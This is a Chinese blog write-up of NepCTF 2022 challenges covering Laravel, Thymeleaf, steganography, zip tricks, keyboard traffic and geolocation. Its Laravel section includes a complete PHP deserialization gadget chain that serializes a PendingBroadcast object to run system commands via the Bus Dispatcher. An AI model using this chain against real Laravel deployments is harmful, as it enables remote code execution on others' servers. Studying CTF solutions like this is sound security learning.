[NepCTF2022] 复现

阅读约 4 分钟

​## Just Kidding

顽皮的HRP用Laravel写了个项目来欢迎大伙来玩Nepctf 2nd,没想到…居然被坏蛋Sharun撅了

www.zip源码泄露 ,啥也不懂没注意正确的入口在哪里,一直把注意力放在web.php上面

没有注意到这里use导入类的路径,跟着路径找到反序列化入口

当时写的过程,确实9.12.2的版本也是用网上流传的9.1.8的链子可以打,

当时就是没找到正确的入口和路径

https://github.com/1nhann/vulns/issues

pop1,直接rce

<?php
namespace Illuminate\Contracts\Queue{
    interface ShouldQueue
    {
        //
    }
}

namespace Illuminate\Bus{
    class Dispatcher{
        protected $container;
        protected $pipeline;
        protected $pipes = [];
        protected $handlers = [];
        protected $queueResolver;
        function __construct()
        {
            $this->queueResolver = "system";

        }
    }
}

namespace Illuminate\Broadcasting{

    use Illuminate\Contracts\Queue\ShouldQueue;

    class BroadcastEvent implements ShouldQueue {
        function __construct()
        {

        }
    }
    class PendingBroadcast{
        protected $events;
        protected $event;
        function __construct()
        {
            $this->event = new BroadcastEvent();
            $this->event->connection = "ls /";
            $this->events = new \Illuminate\Bus\Dispatcher();
        }
    }
}
namespace{
    $a = new \Illuminate\Broadcasting\PendingBroadcast();
    echo base64_encode(serialize($a));
}

注意payload路径 ,上传后 访问源码可以看到成功rce的回显

Challenger

顽皮的HRP又换了种语言写项目来欢迎大家,没想到又让Sharun掘了

java的框架,给了jar, 反编译

目前没学过java,所以跟着wp走一遍,也是网上的链子打

Java安全之Thymeleaf 模板注入分析 - nice_0e3 - 博客园

签到题

binwalk分离图片

得到压缩包套娃

import zipfile

a=""
for i in range(232,2,-1):
  a=str(i)+".zip"
  print(a)
  with zipfile.ZipFile(a) as zf:
    zf.extractall()

芃哥给的脚本解压,解压到最后

本来找密码爆破,其实是伪加密

看文件名也知道是键盘流量了

王一航Usb脚本梭

少见的base

附件就一个jpg试了一下没出来啥信息就放下了,没想到是真签到

JPHS这工具很少用就忘了, 无密码直接seek 就出来了

base58

花花画画画花花

附件下载后 是个osz后缀, 当时用010看是压缩包文件头,就改后缀了。。。。

要正确打开osz文件

osu打开,这个是个音乐游戏吧,

馅饼?陷阱!

右下角有个车牌琼,写的时候都没发现,尚德源茶 定位到三亚 发现正好是这里

左上角就是银行


 赏 
感谢您的支持,我会继续努力哒!
~~  The   End  ~~

文章二维码 本文标签:web, misc, 刷题
最后编辑:2022 年 07 月 20 日 14:51 By ThnPkm
本文链接:http://thnpkm.xyz/index.php/archives/66/(转载时请注明出处及链接! )
作品采用: 署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0) 许可协议授权。
1 + 3 =
快来做第一个评论的人吧~